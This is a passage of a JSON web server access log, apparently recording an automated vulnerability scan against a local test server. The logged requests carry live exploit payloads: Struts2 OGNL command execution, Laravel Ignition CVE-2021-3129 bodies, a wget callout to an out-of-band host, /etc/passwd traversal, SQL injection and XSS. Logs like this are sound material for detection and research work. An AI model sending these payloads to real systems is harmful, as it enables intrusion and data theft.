+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/httpRequests/http-client.cookies HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22AA\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWebAdmin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-resources/restservices/v2/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remotereporter/load_logfiles.php?server=127.0.0.1&url=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"{\x22name\x22:\x22297MFfbj8eIpHfj13gUs2QV0Zfb\x22,\x22basepath\x22:\x22\x22,\x22group_id\x22:\x22{{group_id}}\x22,\x22icon\x22:\x22code-o\x22,\x22color\x22:\x22cyan\x22,\x22project_type\x22:\x22private\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/project/add HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/logoff.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version.web HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/assets/backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/dashboard?maxResults=100 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):: HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authorization.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /heapdump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"------WebKitFormBoundaryAjZMsILtbrBp8VbC\x0D\x0AContent-Disposition: form-data; name=\x22username\x22\x0D\x0A\x0D\x0Aadmin\x0D\x0A------WebKitFormBoundaryAjZMsILtbrBp8VbC\x0D\x0AContent-Disposition: form-data; name=\x22password\x22\x0D\x0A\x0D\x0Apanabit\x0D\x0A------WebKitFormBoundaryAjZMsILtbrBp8VbC--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/userverify.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1/login/login.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"command=delete%20cli%20alias%20private%20list","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.dbeaver/credentials-config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backupmgt/localJob.php?session=fail;wget http://c9v8gc8smpv8b0ng0t00fhsi7act3ptf5.oast.online; HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.341","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger_doc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/diarise/download.php?calendar=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ghost/preview HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /conn.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fpui/jsp/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/assets/backend/elfinder/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sfiler/Login.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/dbstat/gettablessize HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?s=captcha HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/heapdump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.dockerfile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main/calendar/agenda_list.php?type=xss\x22+onmouseover=alert(document.domain)+\x22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wt3/forceSave.php?file=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page_slug=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /does_not_exist%22%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cimg%20src=x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 